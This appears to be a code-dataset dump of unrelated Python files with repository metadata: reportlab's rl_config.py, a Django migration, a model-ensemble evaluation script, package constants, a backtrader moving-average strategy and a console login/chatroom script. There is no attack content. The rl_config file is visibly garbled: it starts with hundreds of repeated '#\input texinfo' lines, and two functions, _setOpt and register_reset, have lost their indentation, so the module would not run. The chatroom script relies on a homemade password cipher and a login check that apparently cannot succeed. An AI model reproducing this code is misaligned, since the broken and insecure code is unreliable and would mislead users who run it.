            except FileNotFoundError:
                pass
def url_to_file_path(url, filecache):
    """Return the file cache path based on the URL.

    This does not ensure the file exists!
    """
    cache_key = CacheController.cache_url(url)
    return filecache._fn(cache_key)
|
[
"[email protected]"
] | |
03e064a0bce0dd00a223a41938dc5d68dd20b8ce
|
6437a3a4a31ab9ad233d6b2d985beb50ed50de23
|
/PythonistaAppTemplate/PythonistaKit.framework/pylib/site-packages/reportlab/rl_config.py
|
14438fb24175d622317b26fc4539590edf37a674
|
[] |
no_license
|
sreyemnayr/jss-lost-mode-app
|
03ddc472decde3c17a11294d8ee48b02f83b71e7
|
3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa
|
refs/heads/master
| 2021-05-02T08:50:10.580091 | 2018-02-08T20:32:29 | 2018-02-08T20:32:29 | 120,813,623 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,725 |
py
|
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
#\input texinfo
'''module that aggregates config information'''
__all__=('_reset','register_reset')
def _defaults_init():
    '''
    create & return defaults for all reportlab settings from
    reportlab.rl_settings.py
    reportlab.local_rl_settings.py
    reportlab_settings.py or ~/.reportlab_settings
    latter values override earlier
    '''
    from reportlab.lib.utils import rl_exec
    import os
    _DEFAULTS={}
    rl_exec('from reportlab.rl_settings import *',_DEFAULTS)
    # Layer the optional package-local settings module over the base defaults.
    _overrides=_DEFAULTS.copy()
    try:
        rl_exec('from reportlab.local_rl_settings import *',_overrides)
        _DEFAULTS.update(_overrides)
    except ImportError:
        pass
    # Then try an importable reportlab_settings module; if that is absent,
    # fall back to executing ~/.reportlab_settings as Python source.
    _overrides=_DEFAULTS.copy()
    try:
        rl_exec('from reportlab_settings import *',_overrides)
        _DEFAULTS.update(_overrides)
    except ImportError:
        _overrides=_DEFAULTS.copy()
        try:
            with open(os.path.expanduser(os.path.join('~','.reportlab_settings')),'rb') as f:
                rl_exec(f.read(),_overrides)
            _DEFAULTS.update(_overrides)
        except:
            # Best-effort: a missing or unreadable user settings file is ignored.
            pass
    return _DEFAULTS
_DEFAULTS=_defaults_init()
_SAVED = {}  # snapshot of option values taken on the first _startUp(); see _reset
sys_version=None  # filled in by _startUp() with e.g. '3.7.4'
# _setOpt below applies an option value, honoring an RL_<name> env override.
def _setOpt(name, value, conv=None):
'''set a module level value from environ/default'''
from os import environ
ename = 'RL_'+name
if ename in environ:
value = environ[ename]
if conv: value = conv(value)
globals()[name] = value
def _startUp():
    '''This function allows easy resetting to the global defaults
    If the environment contains 'RL_xxx' then we use the value
    else we use the given default'''
    import os, sys
    global sys_version, _unset_
    sys_version = sys.version.split()[0] #strip off the other garbage
    from reportlab.lib import pagesizes
    from reportlab.lib.utils import rl_isdir
    if _SAVED=={}:
        # First call: create (or reuse) an interpreter-wide _unset_ sentinel
        # and snapshot every default into _SAVED, module globals and __all__.
        _unset_ = getattr(sys,'_rl_config__unset_',None)
        if _unset_ is None:
            class _unset_: pass
            sys._rl_config__unset_ = _unset_ = _unset_()
        global __all__
        A = list(__all__)
        for k,v in _DEFAULTS.items():
            _SAVED[k] = globals()[k] = v
            if k not in __all__:
                A.append(k)
        __all__ = tuple(A)
    #places to search for Type 1 Font files
    import reportlab
    # Substitution values available to %-templated search path entries.
    D = {'REPORTLAB_DIR': os.path.abspath(os.path.dirname(reportlab.__file__)),
        'CWD': os.getcwd(),
        'disk': os.getcwd().split(':')[0],
        'sys_version': sys_version,
        'XDG_DATA_HOME': os.environ.get('XDG_DATA_HOME','~/.local/share'),
        }
    for k in _SAVED:
        if k.endswith('SearchPath'):
            # Expand each template path, keep only existing directories, then
            # let an RL_<name> env var (os.pathsep separated) override the list.
            P=[]
            for p in _SAVED[k]:
                d = (p % D).replace('/',os.sep)
                if '~' in d: d = os.path.expanduser(d)
                if rl_isdir(d): P.append(d)
            _setOpt(k,os.pathsep.join(P),lambda x:x.split(os.pathsep))
            globals()[k] = list(filter(rl_isdir,globals()[k]))
        else:
            v = _SAVED[k]
            # Pick a converter so env-var overrides keep the default's type.
            if isinstance(v,(int,float)): conv = type(v)
            elif k=='defaultPageSize': conv = lambda v,M=pagesizes: getattr(M,v)
            else: conv = None
            _setOpt(k,v,conv)
_registered_resets=[]
def register_reset(func):
'''register a function to be called by rl_config._reset'''
_registered_resets[:] = [x for x in _registered_resets if x()]
L = [x for x in _registered_resets if x() is func]
if L: return
from weakref import ref
_registered_resets.append(ref(func))
def _reset():
    '''attempt to reset reportlab and friends'''
    _startUp() #our reset
    for f in _registered_resets[:]:
        c = f()
        if c:
            c()
        else:
            # The registered function was garbage collected; drop its ref.
            _registered_resets.remove(f)
_startUp()
|
[
"[email protected]"
] | |
f9448cbb5289f3b55b21ec678cfe5a69529d926d
|
817f5b50ec1fa44c51ba657daea921bce80644a1
|
/blog/migrations/0002_auto_20200113_2245.py
|
fd56d81b4ae7a2e1f39796e6ebf756bf743b5c36
|
[] |
no_license
|
dejosli/ecommerce_pharmacy
|
94b002f25fd116db835bc5c028ee7458aab1dfb6
|
e0b30745f3777b83bcaea686cb46f66102394b42
|
refs/heads/master
| 2021-06-27T14:48:25.766224 | 2021-03-26T03:19:22 | 2021-03-26T03:19:22 | 225,802,123 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 413 |
py
|
# Generated by Django 2.2.5 on 2020-01-13 16:45
from django.db import migrations
# Generated migration: adds default ordering and display names to PostCategory.
class Migration(migrations.Migration):
    dependencies = [
        ('blog', '0001_initial'),
    ]
    operations = [
        # Meta-only change (ordering / verbose names); no schema alteration.
        migrations.AlterModelOptions(
            name='postcategory',
            options={'ordering': ('name',), 'verbose_name': 'post_category', 'verbose_name_plural': 'post categories'},
        ),
    ]
|
[
"[email protected]"
] | |
6ac1325eae05a1491fc3ae51ea134cc72a1fddd0
|
0280fc1aa108b5d8cb73cdb67ba6293ee20d4435
|
/code/test_types/ensembles/get_best_ensemble_combination.py
|
1a934b10b0d67ac208a5f66cbabad8f5fa2b63d0
|
[] |
no_license
|
danielcomerio/2021-SBAI-Covid19_em_RaioX
|
bd8eee7e2c4f7052a5939ec7f1d6eeed0e459d74
|
90c981788c6c9b96e2cab15fd3de5c41a1024553
|
refs/heads/main
| 2023-08-02T15:06:26.831516 | 2021-10-02T23:24:37 | 2021-10-02T23:24:37 | 360,781,005 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,915 |
py
|
import argparse
import os
import numpy as np
from sklearn.metrics import accuracy_score, confusion_matrix, precision_score, f1_score, recall_score, classification_report
from more_itertools import powerset
import random
# Per-model prediction files (one line per test image, formatted as
# "path, label, p0, p1, p2").  Every non-empty subset of these files is
# evaluated as an ensemble in main().
models_path = [
    "test_mobilenetNormal.txt",
    "test_mobilenetProcessed.txt",
    "test_resnetNormal.txt",
    "test_resnetProcessed.txt",
    "test_efficientnetNormal.txt",
    "test_efficientnetProcessed.txt",
    "test_inceptionNormal.txt",
    "test_inceptionProcessed.txt",
]
def get_file_line_values(line):
    """Parse one prediction-file line into (image_name, label, predictions).

    Expected format: "<path>, <label>, <p0>, <p1>, ...".  Only the final
    backslash-separated path component is kept as the image name.
    """
    fields = line.strip().split(", ")
    image = fields[0].split('\\')[-1]
    label = str(fields[1])
    predictions = [float(value) for value in fields[2:]]
    return image, label, predictions
def define_class_maximum(maximums, predicted_class):
    """Update the three per-class running maximums in place and return them."""
    for index in range(3):
        if predicted_class[index] > maximums[index]:
            maximums[index] = predicted_class[index]
    return maximums
def define_class_vote(votes, predicted_class):
    """Add one vote for ``predicted_class``: '0' -> slot 0, '1' -> slot 1,
    anything else -> slot 2.  Mutates and returns ``votes``."""
    key = str(predicted_class)
    if key == '0':
        index = 0
    elif key == '1':
        index = 1
    else:
        index = 2
    votes[index] = votes[index] + 1
    return votes
def define_class_average(predictions_sum, predicted_class):
    """Accumulate per-class prediction values into ``predictions_sum`` in place."""
    for index in range(3):
        predictions_sum[index] += predicted_class[index]
    return predictions_sum
def predictions_average(predictions_sum, n_models=None):
    """Divide the summed class scores in place and return the list.

    Parameters
    ----------
    predictions_sum : list of float
        Per-class score sums accumulated over the ensemble members.
    n_models : int, optional
        Number of models that contributed to the sums.  When given, a true
        per-model average is produced.  When omitted, the historical behavior
        is kept: dividing by the number of CLASSES (the length of the list).
        That divisor is wrong as an "average over models", but it is a
        constant scale factor, so the downstream argmax is unaffected.
    """
    divisor = len(predictions_sum) if n_models is None else n_models
    for index in range(len(predictions_sum)):
        predictions_sum[index] = predictions_sum[index] / divisor
    return predictions_sum
def create_prediction_string(predicted_class):
    """Return the one-hot CSV string for a predicted class index (0, 1 or other)."""
    one_hot = {'0': "1, 0, 0", '1': "0, 1, 0"}
    return one_hot.get(str(predicted_class), "0, 0, 1")
def get_predicted_class(predicted_values):
    """Return the index of the highest prediction, breaking ties randomly.

    Bug fixed: the original flagged a "tie" whenever ANY position equaled the
    maximum -- which always includes the argmax position itself -- so it
    invoked random.choice on every call (harmless for a single maximum, but
    it consumed randomness and the flag was meaningless).  Randomness is now
    used only when two or more positions genuinely share the maximum value.
    """
    best = np.argmax(predicted_values, axis=-1)
    tied = [i for i, v in enumerate(predicted_values) if v == predicted_values[best]]
    if len(tied) > 1:
        return random.choice(tied)
    return best
def get_metrics(file_path, best_accuracy):
    """Score an ensemble's prediction file and track the best accuracy so far.

    Each line of *file_path* is "<image>, <label>, <p0>, <p1>, <p2>"; the
    predicted class is the argmax of the three scores.

    Returns (best_accuracy, improved): the possibly-updated best accuracy and
    whether this file improved on the incoming value.
    """
    file_metrics = open(file_path, "r")
    #file_metrics.write("path_imagem, classe_real, classe_predita")
    melhorou = False  # "improved" (Portuguese)
    label_list = []
    predict_list = []
    line = file_metrics.readline()
    while line:
        line = line.strip().split(", ")
        label_list.append(line[1])
        prediction = [float(line[2]), float(line[3]), float(line[4])]
        prediction = np.argmax(prediction, axis=-1)
        # Labels are strings, so the argmax index is stringified for comparison.
        predict_list.append(str(prediction))
        line = file_metrics.readline()
    file_metrics.close()
    accuracy = accuracy_score(label_list, predict_list)
    if accuracy > best_accuracy:
        best_accuracy = accuracy
        melhorou = True
    return best_accuracy, melhorou
def parse_command_line_args():
    """Parse CLI arguments: positional dataset path plus optional metrics file."""
    parser = argparse.ArgumentParser()
    parser.add_argument("filespath", help="path to the dataset", type=str)
    parser.add_argument("-me", "--metrics", type=str, default="metrics.txt")
    return parser.parse_args()
# py get_best_ensemble_combination.py C:\Users\danie\Desktop\ArtigoDaniel\2021-SBAI-Covid19_em_RaioX\tests_results\files_results -me results.txt
# py ..\..\metrics.py -me C:\Users\danie\Desktop\ArtigoDaniel\2021-SBAI-Covid19_em_RaioX\code\test_types\ensembles\results.txt
def main():
    """Try every non-empty subset of the per-model prediction files and keep
    the subset whose averaged (soft-voting) ensemble scores best.

    For each combination the per-image class values are summed across the
    member files, averaged, argmax'd, and written one-hot to the metrics
    file, which is then scored by get_metrics().
    """
    args = parse_command_line_args()
    BASE_PATH = args.filespath
    best_accuracy = 0
    best_combination = []
    files_path = []
    for model in models_path:
        path = os.path.join(BASE_PATH, model)
        files_path.append(path)
    # powerset()[1:] drops the empty combination
    combination_list = list(powerset(files_path))[1:]
    for combination in combination_list:
        final_file = open(args.metrics, 'w')
        comb = []
        for model in combination:
            comb.append(open(model, 'r'))
        # NOTE(review): `combination` is rebound from paths to open file
        # handles here; `best_combination` below therefore ends up holding
        # closed file objects rather than file paths.
        combination = comb
        line = " "
        while line != '':
            predictions_sum = [0, 0, 0]
            line = combination[0].readline()
            if line == '':
                break
            image, label, prediction = get_file_line_values(line)
            predictions_sum = define_class_average(predictions_sum, prediction)
            # every member file must list the images in the same order
            for pos in range(1, len(combination)):
                line = combination[pos].readline()
                image_compare, _, prediction = get_file_line_values(line)
                if image != image_compare:
                    raise Exception(
                        "Erro, ocorreu manipulação de imagens diferentes.")
                predictions_sum = define_class_average(
                    predictions_sum, prediction)
            # NOTE(review): for a single-member combination the inner loop
            # never runs, so image_compare is undefined here (NameError on
            # the first singleton subset) — confirm singletons are exercised.
            image = image_compare
            predictions_sum = predictions_average(predictions_sum) # -
            predicted_class = get_predicted_class(predictions_sum)
            prediction_string = create_prediction_string(predicted_class)
            final_file.write(str(image) + ", " + str(label) +
                             ", " + prediction_string + '\n')
        for file in combination:
            file.close()
        final_file.close()
        best_accuracy, melhorou = get_metrics(args.metrics, best_accuracy)
        if melhorou:
            best_combination = combination
        print("accuracy_score:", best_accuracy)
        print("best_combination:", best_combination)
|
[
"[email protected]"
] | |
0587480993283923fc28a800af3f56fc5d43a1d5
|
34e3147447875b491bd1b50c915f8848ead80792
|
/uncertainty/constants.py
|
f19f8cdc91913b47521873fbed92985edbf59ce3
|
[
"MIT"
] |
permissive
|
meyersbs/uncertainty
|
680f275ded6aad63012a7ca781d1cf455c66f226
|
c12842cda7bea2d604bb9227a6c0baba9830b6fe
|
refs/heads/master
| 2023-07-20T09:00:25.876780 | 2023-07-07T18:17:07 | 2023-07-07T18:17:07 | 87,837,406 | 19 | 5 |
MIT
| 2023-07-07T18:17:09 | 2017-04-10T17:16:51 |
Python
|
UTF-8
|
Python
| false | false | 510 |
py
|
from pkg_resources import resource_filename
# Absolute paths to the pickled binary/multiclass classifiers and the
# feature vectorizer shipped inside the ``uncertainty`` package
# (resolved at runtime via pkg_resources).
BCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/bclass.p')
MCLASS_CLASSIFIER_PATH = resource_filename('uncertainty', 'models/mclass.p')
VECTORIZER_PATH = resource_filename('uncertainty', 'vectorizers/vectorizer.p')
# Maps the tagger's verbose uncertainty labels to one-letter class codes;
# 'O' (no uncertainty label) maps to 'C'.
# NOTE(review): the semantics of the letters E/D/N/I/C come from the
# project's uncertainty tagset — confirm against the model documentation.
UNCERTAINTY_CLASS_MAP = {
    'speculation_modal_probable_': 'E',
    'speculation_hypo_doxastic _': 'D',
    'speculation_hypo_condition _': 'N',
    'speculation_hypo_investigation _': 'I',
    'O': 'C'
}
|
[
"[email protected]"
] | |
6c937624bd73c970bb18a0b157447143bb654104
|
b5834420791b59e230593f7ef9cf8db0be410998
|
/main.py
|
2ddf96ce8f8c7081f8c3403ac6e26b98701e7f4e
|
[] |
no_license
|
mfatihdurmus/backtrader-test
|
f41f81f425c9b519d917388483d05db40af43c95
|
144c76a782b4044ca81d6097ee0ec975d9821fbc
|
refs/heads/main
| 2023-02-04T19:24:19.118104 | 2020-12-26T22:03:24 | 2020-12-26T22:03:24 | 324,636,259 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,305 |
py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import datetime # For datetime objects
import os.path # To manage paths
import sys # To find out the script name (in argv[0])
# Import the backtrader platform
import backtrader as bt
# Create a Stratey
class TestStrategy(bt.Strategy):
    """SMA strategy from the backtrader quickstart: go long when the close
    rises above a simple moving average, exit when it falls below it."""
    params = (
        ('maperiod', 15),
    )
    def log(self, txt, dt=None):
        ''' Logging function for this strategy'''
        dt = dt or self.datas[0].datetime.date(0)
        print('%s, %s' % (dt.isoformat(), txt))
    def __init__(self):
        # Keep a reference to the "close" line in the data[0] dataseries
        self.dataclose = self.datas[0].close
        # To keep track of pending orders and buy price/commission
        self.order = None
        self.buyprice = None
        self.buycomm = None
        # Add a MovingAverageSimple indicator
        self.sma = bt.indicators.SimpleMovingAverage(
            self.datas[0], period=self.params.maperiod)
        # Indicators for the plotting show
        bt.indicators.ExponentialMovingAverage(self.datas[0], period=25)
        bt.indicators.WeightedMovingAverage(self.datas[0], period=25,
                                            subplot=True)
        bt.indicators.StochasticSlow(self.datas[0])
        bt.indicators.MACDHisto(self.datas[0])
        rsi = bt.indicators.RSI(self.datas[0])
        bt.indicators.SmoothedMovingAverage(rsi, period=10)
        bt.indicators.ATR(self.datas[0], plot=False)
    def notify_order(self, order):
        """Broker callback on order status changes; logs fills and rejections
        and clears the pending-order marker."""
        if order.status in [order.Submitted, order.Accepted]:
            # Buy/Sell order submitted/accepted to/by broker - Nothing to do
            return
        # Check if an order has been completed
        # Attention: broker could reject order if not enough cash
        if order.status in [order.Completed]:
            if order.isbuy():
                self.log(
                    'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %
                    (order.executed.price,
                     order.executed.value,
                     order.executed.comm))
                self.buyprice = order.executed.price
                self.buycomm = order.executed.comm
            else:  # Sell
                self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f' %
                         (order.executed.price,
                          order.executed.value,
                          order.executed.comm))
            self.bar_executed = len(self)
        elif order.status in [order.Canceled, order.Margin, order.Rejected]:
            self.log('Order Canceled/Margin/Rejected')
        # Write down: no pending order
        self.order = None
    def notify_trade(self, trade):
        """Broker callback when a trade closes; logs gross/net profit."""
        if not trade.isclosed:
            return
        self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' %
                 (trade.pnl, trade.pnlcomm))
    def next(self):
        """Called once per bar: buy above the SMA when flat, sell below it
        when in the market; never stacks orders."""
        # Simply log the closing price of the series from the reference
        self.log('Close, %.2f' % self.dataclose[0])
        # Check if an order is pending ... if yes, we cannot send a 2nd one
        if self.order:
            return
        # Check if we are in the market
        if not self.position:
            # Not yet ... we MIGHT BUY if ...
            if self.dataclose[0] > self.sma[0]:
                # BUY, BUY, BUY!!! (with all possible default parameters)
                self.log('BUY CREATE, %.2f' % self.dataclose[0])
                # Keep track of the created order to avoid a 2nd order
                self.order = self.buy()
        else:
            if self.dataclose[0] < self.sma[0]:
                # SELL, SELL, SELL!!! (with all possible default parameters)
                self.log('SELL CREATE, %.2f' % self.dataclose[0])
                # Keep track of the created order to avoid a 2nd order
                self.order = self.sell()
if __name__ == '__main__':
    # Create a cerebro entity
    cerebro = bt.Cerebro()
    # Add a strategy
    cerebro.addstrategy(TestStrategy)
    # Datas are in a subfolder of the samples. Need to find where the script is
    # because it could have been called from anywhere
    modpath = os.path.dirname(os.path.abspath(sys.argv[0]))
    # NOTE(review): assumes datas/orcl-1995-2014.txt exists next to the script
    datapath = os.path.join(modpath, 'datas/orcl-1995-2014.txt')
    # Create a Data Feed
    data = bt.feeds.YahooFinanceCSVData(
        dataname=datapath,
        # Do not pass values before this date
        fromdate=datetime.datetime(2000, 1, 1),
        # Do not pass values after this date
        todate=datetime.datetime(2000, 12, 31),
        # Do not reverse the input CSV's row order
        reverse=False)
    # Add the Data Feed to Cerebro
    cerebro.adddata(data)
    # Set our desired cash start
    cerebro.broker.setcash(1000.0)
    # Add a FixedSize sizer according to the stake
    cerebro.addsizer(bt.sizers.FixedSize, stake=10)
    # Set the commission
    cerebro.broker.setcommission(commission=0.0)
    # Print out the starting conditions
    print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())
    # Run over everything
    cerebro.run()
    # Print out the final result
    print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())
    # Plot the result
    cerebro.plot()
|
[
"[email protected]"
] | |
ad526b0c77d1f2680d586cca25c56ab1a9511e1d
|
6bf1bb4922d5746d2893f9bc09a41dca67872d4e
|
/chatroom_encryption.py
|
018ab46bdbf723ce2b5fb8458d1f3df4019d5c07
|
[] |
no_license
|
ivarols/Login-screen-to-chatroom
|
18b051edc48da243438ce5371513d41ab09bd6cb
|
5e745901c60f67a7aef9b8b64a374a4a51e457d7
|
refs/heads/main
| 2023-03-26T07:12:41.109236 | 2021-03-12T17:09:24 | 2021-03-12T17:09:24 | 345,217,844 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,527 |
py
|
# import encyption_function_for_chatroom.py from whatever directery you have it stored
def register():
    """Interactively register a new user.

    Prompts for a username (single word, not already taken) and a password
    (single word, >= 7 chars, only characters from
    ``encryption_function_for_chatroom.accessable_digits``), encrypts the
    password and appends "username password" to the credentials file.
    Restarts itself (recursively) on any validation failure.
    """
    print("Registration")
    password_r = ""
    username_r = input("Enter username: ")
    username_split_r = len(username_r.split())
    if username_split_r > 1:
        print("No blank spaces within the username.")
        return register()
    elif username_split_r < 1:
        print("No username entered.")
        return register()
    else:
        reg_completion = False
        # reject usernames already present in the credentials file
        with open('#incert .txt-file-name-here#', 'r') as register_r:
            for line in register_r:
                user_info_list = line.split()
                if len(user_info_list) > 0:
                    if user_info_list[0] == username_r:
                        print("Username already taken.")
                        return register()
        while not reg_completion:
            password_r = input("Enter password: ")
            # Bug fix: the word count used to be computed from the *username*
            # (already validated to be one word), so passwords containing
            # spaces were never rejected.  Split the password instead.
            password_split_r = password_r.split()
            words_r = space_control(password_split_r)
            for char in password_r:
                if char not in encryption_function_for_chatroom.accessable_digits:
                    print("Password contains illegal characters.")
                    return register()
            if words_r > 1:
                print("No blank spaces within the password.")
                return register()
            elif words_r < 1:
                print("No password entered.")
                return register()
            elif len(password_r) < 7:
                print("Password is too short.")
                return register()
            else:
                reg_completion = True
        # append the encrypted credentials and show the recovery access-key
        with open('#incert .txt-file-name-here#', 'a') as register_r:
            password_r, access_key2 = encryption_function_for_chatroom.password_encryption(password_r)
            print(f'Your login-info access-key is: {access_key2}')
            register_r.write(f'{username_r} {password_r}\n')
            register_r.close()
def login():
    """Prompt for credentials and check them against the credentials file.

    Returns the username string on success, or False on any failure.
    """
    username_l = input("Enter username: ")
    password_l = input("Enter password: ")
    access = False
    # reject passwords containing characters outside the allowed set
    for char in password_l:
        if char not in encryption_function_for_chatroom.accessable_digits:
            print("Username or password is incorrect.")
            return access
    with open('#incert .txt-file-name-here#', 'r') as login_info:
        for line in login_info:
            login_info_list = line.split()
            if len(login_info_list) > 0:
                # NOTE(review): register() stores only the first element of
                # password_encryption()'s return value, but this compares the
                # stored cipher against the *entire* return value — if that
                # function returns a (cipher, key) pair this can never match;
                # confirm password_encryption()'s return shape.
                if login_info_list[0] == username_l and login_info_list[1] == encryption_function_for_chatroom.password_encryption(password_l):
                    access = True
    login_info.close()
    if access:
        return username_l
    else:
        print("Username or password is incorrect.")
        return access
def get_login_info():
    """Recover a stored password from a username plus its access key.

    The access key must decrypt to a 3-character string of the form
    "<digit><digit>." before it is used to decrypt the stored password.
    Returns the decrypted password, or None (implicitly) when the username
    is not found in the credentials file.  Re-prompts on an invalid key.
    """
    username = input("Enter username: ")
    access_key = input("Enter accesskey: ")
    password_key = encryption_function_for_chatroom.key_decrypter(access_key)
    # validate the decrypted key shape: exactly "NN."
    if len(password_key) != 3:
        print("Invalid access_key")
        return get_login_info()
    elif not password_key[0].isdigit() or not password_key[1].isdigit():
        print("Invalid access_key")
        return get_login_info()
    elif password_key[2] != ".":
        print("Invalid access_key")
        return get_login_info()
    with open('#incert .txt-file-name-here#', 'r') as login_info:
        for line in login_info:
            login_info_list = line.split()
            if len(login_info_list) > 0:
                if login_info_list[0] == username:
                    password_decypted = encryption_function_for_chatroom.message_decryption(login_info_list[1], password_key)
                    return password_decypted
def chatroom(username_c):
    """Run the chat loop for *username_c* until they type '_logout'.

    Each message is echoed back prefixed with the username, with emoticons
    converted via emoji_converter().  Returns False on logout.
    """
    while True:
        message_c = input("> ")
        if message_c == "_logout":
            return False
        print(f'{username_c}: {emoji_converter(message_c)}')
def emoji_converter(message_ec):
    """Replace known emoticon tokens in *message_ec* with emoji.

    Unknown tokens pass through unchanged.  Every token in the output is
    followed by a single space (so a non-empty result ends with a space),
    matching the original word-by-word rebuild.
    """
    emoji_map = {
        ":)": "😀",
        ":(": "🙁",
        "B)": "😎",
        ":p": "😜",
        ";)": "😉",
    }
    converted = [emoji_map.get(token, token) for token in message_ec.split()]
    return "".join(piece + " " for piece in converted)
def space_control(username_sc):
    """Count the items in *username_sc* (typically the words of a split string)."""
    return sum(1 for _ in username_sc)
def greeting(username_g):
    """Print the post-login welcome banner for *username_g*."""
    banner = (
        f'Welcome, {username_g}!',
        "You can now chat.",
        "Exit chat by typing '_logout'.",
    )
    for line in banner:
        print(line)
# Main menu loop: dispatch on the user's chosen action until they type 'exit'.
program_running = True
while program_running:
    print("Enter: 'login' to log in.")
    print("Enter: 'reg' to register.")
    print("Enter: 'forgot_password' to obtain password.")
    action = input("Log in or register: ")
    counter = 0  # NOTE(review): never used below; candidate for removal
    if action == "login":
        print("Login")
        # login() returns the username string on success, False on failure
        username = login()
        if username != False:
            greeting(username)
            running_chat = chatroom(username)
            if running_chat == False:
                print("Chat have been exited and you have been logged out.")
    elif action == "forgot_password":
        password = get_login_info()
        if password is None:
            print("Invalid access_key or username")
        else:
            print(f'password: {password}')
    elif action == "reg":
        register()
    elif action == "exit":
        print("You have exited the program.")
        program_running = False
|
[
"[email protected]"
] | |
f0277517a0c493c33d30df57e6b7bf5cd604f4ff
|
2f176eafaa23e4dcf7309b4b1c751728de6d9a8b
|
/parsing4.py
|
150d77da6090b97bc33c9fb753e5712d3d3f1948
|
[] |
no_license
|
aahnn1223/python_study
|
2586eae3a79a4bb1039a8503582a6fba21acc3c5
|
355a23609128ef1584d1273379c1f16a6e646316
|
refs/heads/master
